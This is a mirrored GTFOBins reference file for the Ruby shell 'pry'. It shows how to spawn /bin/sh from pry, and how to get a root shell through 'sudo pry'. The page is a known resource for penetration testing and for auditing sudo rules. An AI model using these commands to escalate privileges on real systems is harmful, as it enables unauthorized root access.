1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/pry.md

12 lines
145 B
Markdown
Raw Normal View History

2020-03-17 08:49:25 +01:00
---
functions:
shell:
- code: |
pry
system("/bin/sh")
sudo:
- code: |
sudo pry
system("/bin/sh")
---